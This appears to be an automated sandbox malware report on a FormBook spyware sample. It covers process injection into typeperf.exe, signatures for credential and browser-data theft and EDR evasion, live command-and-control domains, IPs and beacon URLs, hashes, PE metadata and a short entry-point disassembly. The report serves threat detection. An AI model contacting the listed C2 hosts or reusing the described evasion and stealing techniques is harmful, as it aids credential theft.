       signatures: Maps a DLL or memory area into another process
       -> uxEGEjhWYrJv.exe injected
            signatures: Found direct / indirect Syscall (likely to bypass EDR)
            -> typeperf.exe (13) started
                 signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                 -> uxEGEjhWYrJv.exe injected
                      signatures: Found direct / indirect Syscall (likely to bypass EDR)
                      network: www.mecateg.xyz 162.0.238.238, ports 49985, 49986, 49987, NAMECHEAP-NETUS, Canada; bluegirls.blog 195.110.124.133, ports 49869, 80, REGISTER-ASIT, Italy; 7 other IPs or domains
                 -> firefox.exe started

Top-level DNS/IP: www.mecateg.xyz (Performs DNS queries to domains with low reputation); www.zingara.life; 22 other IPs or domains
Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 3 other signatures

Antivirus detection for the submitted sample (Source | Detection | Scanner | Label):
sa7Bw41TUq.exe | 61% | ReversingLabs | Win32.Backdoor.FormBook
sa7Bw41TUq.exe | 100% | Avira | HEUR/AGEN.1321671
sa7Bw41TUq.exe | 100% | Joe Sandbox ML |
No Antivirus matches (the report's three remaining scan tables are empty)
URL reputation (Source | Detection | Scanner | Label):
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
These are Chromium's built-in search-provider URLs; they appear in memory because the stealer read the browser's Web Data store, not because the sample contacts them, so they are not indicators of attacker infrastructure.
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.polarmuseum.info | 199.59.243.227 | true | false | | unknown
bluegirls.blog | 195.110.124.133 | true | false | | unknown
www.mecateg.xyz | 162.0.238.238 | true | true | | unknown
www.firstcry.shop | 13.248.169.48 | true | false | | unknown
shops.myshopify.com | 23.227.38.74 | true | false | | unknown
hampelsmagic.life | 76.223.67.189 | true | false | | unknown
consultarfacil.online | 3.33.130.190 | true | false | | unknown
40wxd.top | 206.119.82.134 | true | false | | unknown
www.ophthalmo.cloud | 217.160.0.207 | true | false | | unknown
www.cc101.pro | 188.114.96.3 | true | false | | unknown
dto20.shop | 3.33.130.190 | true | false | | unknown
myjiorooms.services | 3.33.130.190 | true | false | | unknown
allthingsjasmin.com | 3.33.130.190 | true | false | | unknown
www.dto20.shop | unknown | unknown | true | | unknown
www.consultarfacil.online | unknown | unknown | true | | unknown
www.monos.media | unknown | unknown | true | | unknown
www.40wxd.top | unknown | unknown | true | | unknown
www.hampelsmagic.life | unknown | unknown | true | | unknown
www.myjiorooms.services | unknown | unknown | true | | unknown
www.zingara.life | unknown | unknown | true | | unknown
www.allthingsjasmin.com | unknown | unknown | true | | unknown
www.bluegirls.blog | unknown | unknown | true | | unknown
www.i16zb920d.cfd | unknown | unknown | true | | unknown
www.trafegomagico.shop | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.zingara.life/s7qk/?ZZY=iaY+w4IpIrYSidyoirH4HJSkbusQX4NI5gNJJ4lc6xQkeif0pMuzzCPjcczGW/AsONaxEKF5w0HAACs6c94+MzxqwLAwe70WCnJ+QkbRlWeyUQ/E8YwpuoNtXuk6ep3axG9muxvIvCTd&mHm0o=rrqhoH | false | | unknown
http://www.myjiorooms.services/bp9c/ | false | | unknown
http://www.polarmuseum.info/reui/ | false | | unknown
http://www.allthingsjasmin.com/eysm/?ZZY=rmFmYSV40EyuHaS2kdWsBSatZMcowP18dPlfx0Yf8gPpQKE966Dkx6Jhfns0QUWGli+3EHMWEp7NMhxdNQGBoYEKFyRFG/hWuIrsEVQcMyBNET9pI9FmSsALbFuO7R/DpXmPiDL0RAp8&mHm0o=rrqhoH | false | | unknown
http://www.consultarfacil.online/fvi9/ | false | | unknown
http://www.cc101.pro/0r21/ | false | | unknown
http://www.mecateg.xyz/sq12/ | false | | unknown
http://www.firstcry.shop/e4x0/ | false | | unknown
http://www.cc101.pro/0r21/?mHm0o=rrqhoH&ZZY=fpQWUmUD3QBv9qaBiDNDC55X+pZkXcZKAs7PtWtHybHyzx2AGLiILISraADyo1q+hqHiafFS+6J0wcG7bEgZBkPYVPFAzuLp86jiTbWXEL7WrvfJBC+mpaVtq3e+NG0F9h9/HweK9zd4 | false | | unknown
http://www.myjiorooms.services/bp9c/?ZZY=CFj7iDxn1x8AZpvFPceYGF6mfIwPwoMTrHXd5ZNPnjoM55LZ4XrC1cu6kzZqztyAGGEhFACZ681UEqmRh4qhBCgu4rL42B/pdGdLhtvwmGlR74+AXtAhf2M5tQk/HW327Y9QXMr8MgHb&mHm0o=rrqhoH | false | | unknown
http://www.40wxd.top/0cbg/ | false | | unknown
http://www.mecateg.xyz/sq12/?ZZY=z6EWwjUgJz2bJPVNnwixtdiBclz6U+1c8CkWN3ljQgjJGrzDNHqxSoLtP95ZDgz7MgUxfMzo2dU5U8jEaokJ+YFKTiu0SNRlbEWC0HQQ7kWDv/RczpK4Ywebc8IjilGLuKMcxKVh8K9W&mHm0o=rrqhoH | false | | unknown
http://www.consultarfacil.online/fvi9/?ZZY=83Zhgfg6tu/foMGa1rd4G8mvZ8J0ctT1sQtAA8307wl6fpXmtYNgS0h47hPctXYzi3krAK+TuMk8NNNUc7/zlizFi4+uLzj6JeI9HOwnvOMl9isW4EM/0itfBtO8+qbotuSJUZ1vI2TR&mHm0o=rrqhoH | false | | unknown
http://www.polarmuseum.info/reui/?ZZY=86WVBsaKd0g/fiy38lBVTFNtYioQJ/XID2I2jzZkjXxxzqQXnIBLpzjUTcMxZ+VjRI6hFe2KzQRCqdeRoprBsBuO38R4j7pNa7/TdtnWnso/3MHserSUB0MZw7CHuHvixsEQagEWFuT7&mHm0o=rrqhoH | false | | unknown
http://www.hampelsmagic.life/jso9/?mHm0o=rrqhoH&ZZY=uWtD7nDJzC5KbaeYt4wzjwT7dfNvmhcBXDjCWDtDb+iw4yKFuJufFHLJAdi3pLpd6ZSxNjMYLeNLKkNP8PCKZOHQQMiufYU5amodYVRyhU2Q7ZK2dy5aUiQd9WIqGEuwGA/AmJwbELRk | false | | unknown
http://www.dto20.shop/qt7h/ | false | | unknown
http://www.bluegirls.blog/ptae/?ZZY=w3WU5oZhC+LnKx26kaNk+YWYu6qqBKD6PC4MUwZYu/Z6/i99bgGsvL6SKkltDKfqu2CGNTh4TErFYwL/tEu+bdChCdZ/afdxeSWGORoCU6iTOQ97Sy+G7WrM0B37ODseprTGeRopW7u8&mHm0o=rrqhoH | false | | unknown
http://www.40wxd.top/0cbg/?ZZY=ReVCyzq7e32zPSksEOCt3pbKcx4rKGTIyRipE0uGIQ28zkTth8noQJXIJc3ts0ISqVogbi/TYpoiqGzNpNOIXMLKx0kCr+Xw6Q+8qepVva7bCGUCYF3oCYt7aX6G3loK+iyEYGVwNCt0&mHm0o=rrqhoH | false | | unknown
http://www.zingara.life/s7qk/ | false | | unknown
http://www.allthingsjasmin.com/eysm/ | false | | unknown
http://www.dto20.shop/qt7h/?mHm0o=rrqhoH&ZZY=lVRVVIZsXSPU4aIYLW3uXU2G9jyJVB0KcS4/r4NcfnqYIb12Sac4jtyjmKkxLIaqvFDuni/4q4Q88o0YH0xwolv7HpcPHG6ier6546/NEIR09zDvHF3f9eFxq1b7awb/89CQg1iAKK+O | false | | unknown
http://www.hampelsmagic.life/jso9/ | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://156.226.108.99:28888/ | typeperf.exe, 0000000C.00000002.3739193871.0000000003E38000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3740970787.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737715494.0000000003098000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://zingara.life/s7qk?ZZY=iaY | typeperf.exe, 0000000C.00000002.3739193871.0000000004936000.00000004.10000000.00040000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737715494.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://ac.ecosia.org/autocomplete?q= | typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com | typeperf.exe, 0000000C.00000002.3739193871.0000000004AC8000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3740970787.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737715494.0000000003D28000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.allthingsjasmin.com | uxEGEjhWYrJv.exe, 0000000E.00000002.3739752184.0000000004E1B000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.firstcry.shop | United States | 16509 | AMAZON-02US | false
195.110.124.133 | bluegirls.blog | Italy | 39729 | REGISTER-ASIT | false
76.223.67.189 | hampelsmagic.life | United States | 16509 | AMAZON-02US | false
188.114.96.3 | www.cc101.pro | European Union | 13335 | CLOUDFLARENETUS | false
199.59.243.227 | www.polarmuseum.info | United States | 395082 | BODIS-NJUS | false
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | false
206.119.82.134 | 40wxd.top | United States | 174 | COGENT-174US | false
3.33.130.190 | consultarfacil.online | United States | 8987 | AMAZONEXPANSIONGB | false
162.0.238.238 | www.mecateg.xyz | Canada | 22612 | NAMECHEAP-NETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1529872
Start date and time: 2024-10-09 14:03:59 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: sa7Bw41TUq.exe (renamed because original name is a hash value)
Original Sample Name: 207680e811fa11e2aceed223a1ac803751e70ef42f951fad9a068530b0044727.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@16/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 48
• Number of non-executed functions: 316
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtAllocateVirtualMemory calls found
• VT rate limit hit for: sa7Bw41TUq.exe
Time | Type | Description
09:59:06 | API Interceptor | 8901741x Sleep call for process: typeperf.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.248.169.48 | 8EhMjL3yNF.exe | malicious | FormBook | www.firstcry.shop/2mvq/
13.248.169.48 | BAJFMONYm2.exe | malicious | FormBook | www.jacquesjanine.online/ey4t/
13.248.169.48 | fJD7ivEnzm.exe | malicious | FormBook | www.dyme.tech/h7lb/
13.248.169.48 | jpdy1E8K4A.exe | malicious | FormBook | www.dyme.tech/h7lb/
13.248.169.48 | Pending invoices.exe | malicious | FormBook | www.extrem.tech/lwlk/
13.248.169.48 | Arrival Notice.exe | malicious | FormBook | www.firstcry.shop/e4x0/
13.248.169.48 | presupuesto urgente.exe | malicious | FormBook, GuLoader | www.sleephygienist.org/9ned/
13.248.169.48 | -pdf.bat.exe | malicious | FormBook | www.invicta.world/tcs6/
13.248.169.48 | payment copy.exe | malicious | FormBook | www.firstcry.shop/e4x0/
13.248.169.48 | Arrival Notice_pdf.exe | malicious | FormBook | www.invicta.world/aohi/
195.110.124.133 | IRYzGMMbSw.exe | malicious | FormBook | www.hentaistgma.net/8ouq/
195.110.124.133 | rpedido-002297.exe | malicious | FormBook, GuLoader | www.nidedabeille.net/qwre/
195.110.124.133 | PO5118000306 pdf.exe | malicious | FormBook | www.hentaistgma.net/00ob/
195.110.124.133 | rAGROTIS10599242024.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | BL Draft-Invoice-Packing list-Shipping Document.pif.exe | malicious | FormBook | www.trisixnine.net/0057/
195.110.124.133 | oO3ZmCAeLQ.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | Purchase Order_ AEPL-2324-1126.exe | malicious | FormBook | www.bluegirls.blog/7m8b/
195.110.124.133 | file.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | file.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | Quote 05-302.lnk | malicious | FormBook | www.elettrosistemista.zip/fo8o/
76.223.67.189 | Arrival Notice.exe | malicious | FormBook | www.hampelsmagic.life/jso9/
76.223.67.189 | payment copy.exe | malicious | FormBook | www.hampelsmagic.life/jso9/
76.223.67.189 | nBjauMrrmC.exe | malicious | FormBook | www.liposuctionclinics2.today/btrd/?tTuD=g2Awi9hANRWSeHI+wJBlCrpPGRTrEfCXfEKIFQJbxQMjrXhRPDH163dN6i0CqgMQjQgJ&XBZp7=lTrl
76.223.67.189 | PO-001.exe | malicious | FormBook |
                                                                                                                • www.gyver.cloud/defz/
                                                                                                                Purchase order.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.gyver.cloud/defz/
                                                                                                                Remittance advice.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.gyver.cloud/defz/
                                                                                                                RBNB5FNsEZ.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.lbrdllc.net/4td1/?GjDp=Mp09RwvUomJ9LXRQ0XXGCNq6UNAmFqUcDl1tWTrb4Rz5hKz8dsUEbFKiOphpKzlkCKZ5leoHIFrZ23gaRy5L0mKULuXEHcKuiIkJas++2MAFVHNjs/dsbZE=&bN7xP=uTAt3vp8TJJx5z
                                                                                                                firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 76.223.67.189/
                                                                                                                GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.gyver.cloud/3uka/
                                                                                                                IMG_00991ORDER_FILES.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                • www.gyver.cloud/7arp/
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                www.mecateg.xyzArrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 162.0.238.238
                                                                                                                payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 162.0.238.238
                                                                                                                www.polarmuseum.infoenkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 199.59.243.227
                                                                                                                Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 199.59.243.227
                                                                                                                payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 199.59.243.227
                                                                                                                www.firstcry.shop8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 13.248.169.48
                                                                                                                Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 13.248.169.48
                                                                                                                payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 13.248.169.48
                                                                                                                shops.myshopify.comImBm40hNZ2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                • 23.227.38.74
                                                                                                                8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 23.227.38.74
                                                                                                                Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 23.227.38.74
                                                                                                                payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 23.227.38.74
                                                                                                                ORDER ENQUIRY.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 23.227.38.74
                                                                                                                https://ebookkeepers.com.pk/Get hashmaliciousUnknownBrowse
                                                                                                                • 23.227.38.74
                                                                                                                http://fix-bill.com/Get hashmaliciousUnknownBrowse
                                                                                                                • 23.227.38.74
                                                                                                                H9DsG7WKGt.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 23.227.38.74
                                                                                                                https://cancelar-plan-pr0teccion1.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                                                                                • 23.227.38.74
                                                                                                                ORDER_1105-19-24-3537.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 23.227.38.74
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                AMAZON-02US#GtantTTcopy.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 76.223.105.230
                                                                                                                8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 54.67.42.145
                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                • 52.222.236.120
                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                • 52.222.236.23
                                                                                                                BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 52.13.151.179
                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 52.222.236.23
                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 52.222.236.80
                                                                                                                FW Document shared with you Remote Work Policy Update.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 52.16.10.74
                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                • 52.222.236.120
                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                • 52.222.236.23
                                                                                                                REGISTER-ASITIRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 195.110.124.133
                                                                                                                Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 195.110.124.133
                                                                                                                rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                • 195.110.124.133
                                                                                                                payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 195.110.124.133
                                                                                                                PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 81.88.63.46
                                                                                                                PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 195.110.124.133
                                                                                                                rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 81.88.63.46
                                                                                                                rAGROTIS10599242024.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 195.110.124.133
                                                                                                                BL Draft-Invoice-Packing list-Shipping Document.pif.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 195.110.124.133
                                                                                                                oO3ZmCAeLQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 195.110.124.133
                                                                                                                CLOUDFLARENETUSwUOozlNZS3.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 188.114.96.3
                                                                                                                wrE1XO6ZFI.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                • 188.114.97.3
                                                                                                                wUOozlNZS3.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 188.114.97.3
                                                                                                                IT3rIaXTLZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 104.26.12.205
                                                                                                                https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzIzOTU1LCJuYmYiOjE3MjgzMjM5NTUsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiIxMzhudno3eXlrZ2h1NDA5OGZrYiIsInRva2VuIjoiMTM4bnZ6N3l5a2dodTQwOThma2IiLCJzZW5kX2F0IjoxNzI4MzIyODA2LCJlbWFpbF9pZCI6OTk2NDk2NywiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTQ0ODIsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj1XZSUyN3JlK3Rha2luZytvdmVyK3RoaXMrTmF0aW9uYWwrRGF5In0.z00HBrh18YFkCiPz9m_Gcq8DkC4g7ZLK6Qs5LoMEHUoGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 188.114.96.3
                                                                                                                ImBm40hNZ2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                • 104.21.50.202
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.53.8
                                                                                                                awb_dhl 9102845290_160924R0 _323282-_563028621286.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 188.114.97.3
                                                                                                                9vhyFG1hNa.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 172.67.165.25
                                                                                                                9EIf7Sfk3P.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 188.114.97.3
                                                                                                                AMAZON-02US#GtantTTcopy.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 76.223.105.230
                                                                                                                8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 54.67.42.145
                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                • 52.222.236.120
                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                • 52.222.236.23
                                                                                                                BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 52.13.151.179
                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 52.222.236.23
                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 52.222.236.80
                                                                                                                FW Document shared with you Remote Work Policy Update.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 52.16.10.74
                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                • 52.222.236.120
                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                • 52.222.236.23
                                                                                                                No context
                                                                                                                No context
Process: C:\Users\user\Desktop\sa7Bw41TUq.exe
File Type: data
Category: modified
Size (bytes): 288256
Entropy (8bit): 7.993157621221895
Encrypted: true
SSDEEP: 6144:qYJXAG7ViQnff6PL3eqxaDXttM4VrjbD6:qY5AvQfyPqQetM4Vrj/6
MD5: 6C3C924090D3E35B6DAEEA11AD32FAC2
SHA1: E926A709EB4CBC78B5CF6043F1652DAD42720B02
SHA-256: 8BE62695471B25C14A3EA8CBC33BB80577B9D1082709451B334F18D4A2D1FFC9
SHA-512: 0F4ABAB6EAC7B0E6E83DA53853EA22981C066B73655B03272F617170049517D580EA8C97C920AEF54F5205FB687D5329701F42F3E34DD5FE22FB40BE69EAAFD7
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\typeperf.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: modified
Size (bytes): 196608
Entropy (8bit): 1.1215420383712111
Encrypted: false
SSDEEP: 384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5: 9A809AD8B1FDDA60760BB6253358A1DB
SHA1: D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256: 95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512: 2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious: false
Reputation: moderate, very likely benign file
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.54270969125083
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: sa7Bw41TUq.exe
File size: 1'364'575 bytes
MD5: 6cd77b30f320ed9e0e515073e1175898
SHA1: c60f550fefe35a235e0ddddf876626cf0bdd77eb
SHA256: 207680e811fa11e2aceed223a1ac803751e70ef42f951fad9a068530b0044727
SHA512: 9e7a73af7f2e0585b10f8caec50e037f312291e0bbcd52d191acceb56b28df993672b5787396428a63f60ccc592ca605b22150f8bb91864dde6e3be4f70f322c
SSDEEP: 24576:uRmJkcoQricOIQxiZY1iaCDon9ioPvWGE590RWtG6inoJ6xF5:7JZoQrbTFZY1iaCDo9ioPvWTE8o60oAl
TLSH: C755F121B9D68076C2B323B19E7FF76A9A3D79360327D19727C42D324EA05416B29733
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
Icon Hash: 1733312925935517
Entrypoint: 0x4165c1
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
                                                                                                                Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
Instruction
call 00007F654D1AA0BBh
jmp 00007F654D1A0F2Eh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F654D1A10AAh
cmp edi, eax
jc 00007F654D1A1246h
cmp ecx, 00000080h
jc 00007F654D1A10BEh
cmp dword ptr [004A9724h], 00000000h
je 00007F654D1A10B5h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007F654D1A10A7h
jmp 00007F654D1A1482h
test edi, 00000003h
jne 00007F654D1A10B6h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007F654D1A10CBh
rep movsd
jmp dword ptr [00416740h+edx*4]
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007F654D1A10AEh
and eax, 03h
add ecx, eax
jmp dword ptr [00416654h+eax*4]
jmp dword ptr [00416750h+ecx*4]
nop
jmp dword ptr [004166D4h+ecx*4]
nop
inc cx
add byte ptr [eax-4BFFBE9Ah], dl
inc cx
add byte ptr [ebx], ah
ror dword ptr [edx-75F877FAh], 1
inc esi
add dword ptr [eax+468A0147h], ecx
add al, cl
jmp 00007F654F6198A7h
add esi, 03h
add edi, 03h
cmp ecx, 08h
